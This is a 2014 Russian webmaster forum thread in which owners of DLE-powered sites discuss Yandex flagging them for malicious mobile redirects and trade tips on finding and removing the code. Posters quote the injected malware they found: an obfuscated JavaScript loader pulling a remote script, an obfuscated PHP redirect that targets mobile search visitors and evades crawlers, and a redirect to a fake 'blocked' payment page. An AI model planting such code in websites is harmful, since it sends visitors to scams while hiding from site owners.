Яндекс, найдется все!

Это нравится:0 Да/0 Нет

Krol

29.05.201401:3529 Май 2014 01:35:59

В общем то только яндекс мог найти вирусы даже там где их нету, на моих трех сайтах он нашел мобильный редирект, я пробовал заходить Со своего андроида, попросил зайти друга с айфона, никуда не перекидывает, проверил все файлы тоталом нигде нету слов андроид или айфон, прошелся по стандартным файлам где он бывает ( редирект ) тоже пусто, вчера пометил еще пару моих сайтов и там тоже ничего нету. Кто еще заметил такое?

Krol

29.05.201401:3529 Май 2014 01:35:59

Просмотров:3303 Комментариев:20 Это нравится:0 Да/0 Нет

<script type="text/javascript"> function setCookie(cname,cvalue,exdays) { var d = new Date(); d.setTime(d.getTime()+(exdays*24*60*60*1000)); var expires = "expires="+d.toGMTString(); document.cookie = cname + "=" + cvalue + "; " + expires; } function getCookie(cname){var name = cname + "=";var ca = document.cookie.split(';');for(var i=0; i<ca.length; i++) {var c = ca[i].trim();if (c.indexOf(name)==0) return c.substring(name.length,c.length);}return "";}if(!getCookie('ml_redirrect')){setCookie('ml_redirrect',1,30);document.write("<script type=\"text\/javascript\" src=\"ht"+"tp:\/\/m"+"ob"+"il"+"eg"+"et"+"t"+"i"+"n"+"g."+"ru\/j"+"s?"+"id=7"+"7"+"4"+"9\"><\/script>"); } </script>

$usg = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))];$rf = $_SERVER[strrev(strtoupper('rerefer_ptth'))]; if(!preg_match('/crawl|andex|oogle|bot/i',$usg)) {if(preg_match('/andex|mail|rambler|oogle|bot/i',$rf)) { if((preg_match('/ndroid|midp|j2me|symbian|series\ 60|symbos|htc_/i',$usg)) and (!isset ($_COOKIE['dle_user_id'])) and ($_COOKIE["mt_"] != 1)) {@setcookie('mt_', '1', time()+86400 * 7, '/'); header(strrev('=rerefer&3?'.'/ten.'.'lld-'.'swen'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}}}

#!/usr/bin/env python import os, time for root, files, dirs in os.walk("/"): for name in files: path = os.path.join(root, name) mtime = os.stat(path).st_mtime now = time.time() two_days_ago = now - 2 * 86400 one_years_ago = now - 365 * 86400 if mtime > one_years_ago: print "%s, %s, one years ago"%(path, time.ctime(mtime)) elif mtime > two_days_ago: print "%s, %s, 2 days ago"%(path, time.ctime(mtime))

Новые темы	Объявления	Свободное общение
12:11 Сайты-копипасты 11:09 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 09:21 Привеееет, дорогостоящая моя! Ну ты даешь, как счастлива созидать тебя тут на нашем веб-сайте! А если ты все еще не уверена, зачем он тебе необходим, то давай, я для тебя все раскажу, как лучшая подружка. 21:19 Google рассматривает возможность взимания платы за поиск 21:15 Артемий Лебедев: «ВКонтакте» станет «новым поисковиком» 21:12 Самозанятые смогут зарабатывать в рекламной сети VK 20:44 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.	08:16 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 23:45 Криптовалютный обменник Xgram.io - новое воплощение качества 12:23 Готовые аккаунты Яндекс Директ с пройденной модерацией, с отлежкой, трастовые 11:42 Продаются аккаунты Яндекс Директ без НДС (валюта USD). +20% к вашему бюджету 10:43 USMobileSMSBot - 06:49 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 13:32 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика	12:09 Видимо, похороны СУПРа уже прошли как-то по-тихому 03:09 Точные прогнозы на футбол 21:51 С юмором по жизни! 21:32 Добро пожаловать в цифровой мир... 12:04 Как получить рефералов и посетителей на сайт бесплатно. 12:48 Каспкрски ОС 11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди

Новые темы

Объявления

Свободное общение

12:11 Сайты-копипасты
11:09 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика!
09:21 Привеееет, дорогостоящая моя! Ну ты даешь, как счастлива созидать тебя тут на нашем веб-сайте! А если ты все еще не уверена, зачем он тебе необходим, то давай, я для тебя все раскажу, как лучшая подружка.
21:19 Google рассматривает возможность взимания платы за поиск
21:15 Артемий Лебедев: «ВКонтакте» станет «новым поисковиком»
21:12 Самозанятые смогут зарабатывать в рекламной сети VK
20:44 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.

08:16 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust
23:45 Криптовалютный обменник Xgram.io - новое воплощение качества
12:23 Готовые аккаунты Яндекс Директ с пройденной модерацией, с отлежкой, трастовые
11:42 Продаются аккаунты Яндекс Директ без НДС (валюта USD). +20% к вашему бюджету
10:43 USMobileSMSBot -
06:49 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные
13:32 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика

12:09 Видимо, похороны СУПРа уже прошли как-то по-тихому
03:09 Точные прогнозы на футбол
21:51 С юмором по жизни!
21:32 Добро пожаловать в цифровой мир...
12:04 Как получить рефералов и посетителей на сайт бесплатно.
12:48 Каспкрски ОС
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди

Максим

29 Май 2014 02:44:25

надо пробовать заходить не через вафлю, а именно через симку+если с украины вы или другой страны, может быть, что только на рф редерект стоит. Скиньте сайты в лс зайду с айапда/айфона (оператор мегафон и мтс россия).

Ссылка Это нравится:0 Да/0 Нет

Huts

29 Май 2014 11:15:38

Есть такое дело, 1 сайт уже висит помеченный, как опасный (мобильный редирект), зашёл на сервер и ничего особого не нашёл. Зашёл htacces, а там пипец и не удаляется никак. И причём на всех сайтах так стало. 2 сайта снёс не нужных. Через них было заражение скорей всего, т.к. скопировал всё что было на сервере на комп и антивирус ругнулся. Только всё это глубокой ночью делал, доделать не успел, и уехал. ХЗ как там щас всё.

Tenderlib

29 Май 2014 14:29:01

Смотреть нужно. Когда на клиентских сайтах, яндекс обнаруживал редиректы, не было случая чтобы он ошибался. (по крайней мере у меня). Находил проблему и решал её.
В принципе могу посмотреть проблемный сайт.

29 Май 2014 17:46:55

В общем то нашел на всех трех странный код

Код

29 Май 2014 17:47:14

Кто встречал? что то я его найти не могу нигде.

blogazter

30 Май 2014 23:56:22

Обычный код редиректа. срабатывает раз в сутки. Работает по кукам, пользователь запоминается.

Родитель Ссылка Это нравится:0 Да/0 Нет

Н. О.

29 Май 2014 20:04:01

Что за CMS?

29 Май 2014 20:17:02

DLE

29 Май 2014 21:01:33

Про твоё не нашёл даже ничего похожего. На своем после удаления двух сайтов всё пришло в норму. но дыру явно нужно закрывать. Попробуй всё таки перекинуть все файлы (всего сервера) на комп и проверить антивиром. Так же глянь тут какая то программка "айболит". Может найдёт что. Я хотел её использовать, но и так решилось всё.

29 Май 2014 22:05:16

Тут короче такая тема, меня редиректит на сайт какого то надзора или еще чего то и пишет типо ваш ip заблокирован и типо введите номер или оплатите что то)

29 Май 2014 22:05:55

Причем сначала попадаю на свой сайт, потом кидает на этот псевдо)

Proenix

29 Май 2014 23:00:23

Был какой то моб редирект на дле на всех сайтах моих. Интересно что редирект срабатывал только в определенное время суток и второй раз для одного телефона не срабатывал. Заказывал лечение у "айболита" за 2тыс.руб. Они нашли такой код в index.php

До сих пор не пойму почему я сам на такой код внимания не обратил, хотя специально помню менял все такие файлы движка на оригинальные

paltarasych

29 Май 2014 23:28:42

это жжжж не с проста (с)
заходите по ftp на хостинг, и если есть такая возможность - смотрите все что были недавно изменены (по дате)
далее в этих файлах ctrl+f и к примеру j2me ищем.
находим нечто подобное что уже указано и просто удаляем, или меняем на оригинал (если есть)

30 Май 2014 02:00:10

 <script>setTimeout( 'location="http://rupolonin.co.vu/stream009/node.php";', 5000 );</script>

Нашел я скрипт, его видно в исходном коде

кидает на латник типо вас блокирнули и тп, но найти его ни в файлах ни в бд не могу.

30 Май 2014 09:17:26

в панели ftp доступа если есть поиск вводим домен - он должен найти, или как говорил выше по дате смотрим - идин или два должны быть отличны от всей массы файлов.

Drum Oleg

30 Май 2014 13:37:33

Всегда такие проблемы решал с помощью саппорта хостинга, правда это от самого хостинг-провайдера зависит. Благо поддержка всегда на связи и отвечают в течении 15 мин :)

Коч Вадим

30 Май 2014 14:12:27

Добрый день, не знаю, как в DLE, но в старых версиях вордпресса есть уязвимость, ну когда кто-то скидывает комментарийй на блог, и включает туда XSS-atack, ну что-то по типу, переход с Вашего сайта на другой, потом на другом сайте, если есть параметр в GET-query строке, то может снова перекинуть на Ваш - и получится бесконечное зацикливание, так, лечится это путем, либо смотрите на хостинге через SSH когда именно были изменены файлы, ну например, если Яндекс запреметил 2, дня или 3 дня давности, то вот такой скрипт на Python поможет

Скрипт немного недописан, но должен работать, можно закомментировать условие if one_years_ago
Или просто обратитесь в службу техподдержки хостинга

30 Май 2014 14:19:16

И в 3-ей строке можно изменить параметр, os.walk('/home/kroll/..../public_html/....'), ну чтобы не проходиться по всей файловой системе

31 Май 2014 05:49:08

Спасибо всем, вроде разобрался

Master Ser

31 Май 2014 15:31:55

а какая версия DLE у всех сайтов?